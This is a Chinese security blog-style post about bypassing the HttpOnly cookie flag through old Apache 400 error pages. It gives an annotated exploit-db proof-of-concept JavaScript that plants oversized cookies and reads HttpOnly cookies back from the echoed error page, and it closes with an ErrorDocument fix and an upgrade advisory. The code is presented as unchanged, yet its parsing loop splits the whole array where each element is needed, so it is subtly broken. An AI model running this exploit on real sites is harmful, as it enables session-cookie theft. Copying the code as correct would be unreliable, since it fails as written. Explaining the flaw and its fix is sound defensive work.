很多程序以及一些商业或成熟开源的CMS文章系统,为了防止XSS盗取用户Cookie,一般都会给Cookie加上HttpOnly属性,禁止直接用JS读取用户的Cookie,从而降低XSS的危害;而下面描述的这个问题刚好可以用来绕过Cookie的HttpOnly属性。

用Chrome打开一个站点,按F12打开开发者工具,切换到Console,输入如下代码并回车:

// http://www.exploit-db.com/exploits/18442/
// Helper from the exploit-db listing referenced above (public PoC, reproduced unchanged).
// Called with no argument: plants ten cookies "xss0".."xss9", each 819 bytes long, so that
//   the browser's next request to this origin carries a very large Cookie header
//   (presumably this is what makes the server answer 400 — see makeRequest below).
// Called with good === true: expires those same ten cookies again.
function setCookies (good) {
  // Construct string for cookie value: 819 repetitions of "x"
  var str = "";
  for (var i=0; i< 819; i++) {
    str += "x";
  }
  // Set (or expire) the ten cookies; `i` is reused from the loop above (var is function-scoped)
  for (i = 0; i < 10; i++) {
    // Expire evil cookie: an expiry date one millisecond in the past removes it
    if (good) {
      var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
    }
    // Set evil cookie: name xss<i>, value = the 819-byte filler, site-wide path
    else {
      var cookie = "xss"+i+"="+str+";path=/";
    }
    document.cookie = cookie;
  }
}
// Drives the demonstration: plants the oversized cookies, issues one XHR to "/" and, if the
// server replies 400 with the request echoed inside <pre>...</pre>, extracts every cookie
// from that echo — including cookies flagged HttpOnly, which document.cookie alone would
// not expose — and shows them with alert(). The xss* filler cookies are expired again
// before the alert.
function makeRequest() {
  // Plant the filler cookies (good is undefined here, so the "Set evil cookie" branch runs)
  setCookies();
  // readystatechange handler; reads `xhr` from the enclosing scope (hoisted var, assigned below
  // before the handler can fire)
  function parseCookies () {
    var cookie_dict = {};
    // Only react on 400 status
    if (xhr.readyState === 4 && xhr.status === 400) {
      // Replace newlines and match <pre> content
      var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
      // NOTE(review): match() returns null when the 400 page contains no <pre> block (e.g. a
      // server that does not echo the request), so this check throws instead of falling through.
      if (content.length) {
        // Remove Cookie: prefix
        content = content[1].replace("Cookie: ", "");
        // Drop the xss* filler cookies, then split the remaining "name=value" pairs on ";"
        var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
        // Add cookies to object
        for (var i=0; i<cookies.length; i++) {
          var s_c = cookies.split('=',2);
          cookie_dict[s_c[0]] = s_c[1];
        }
      }
      // Unset malicious cookies
      setCookies(true);
      alert(JSON.stringify(cookie_dict));
    }
  }
  // Make XHR request
  var xhr = new XMLHttpRequest();
  xhr.onreadystatechange = parseCookies;
  xhr.open("GET", "/", true);
  xhr.send(null);
}
// Start the demonstration as soon as the snippet is pasted into the console.
makeRequest();

你就能看见华丽丽的400错误页,其中包含着cookie信息。
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#

修复方案:

Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下

In the event of a problem or error, Apache can be configured to do one of four things:

1. output a simple hardcoded error message 输出一个简单的硬编码错误信息
2. output a customized message 输出一段自定义信息
3. redirect to a local URL-path to handle the problem/error 转向一个本地的自定义页面
4. redirect to an external URL to handle the problem/error 转向一个外部URL

经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容。

Apache配置:
ErrorDocument 400 "security test"

当然,升级Apache到最新版本也可以:)。ErrorDocument 的做法只是让400响应不再回显Cookie内容,升级才是从源头修复。
参考:http://httpd.apache.org/security/vulnerabilities_22.html
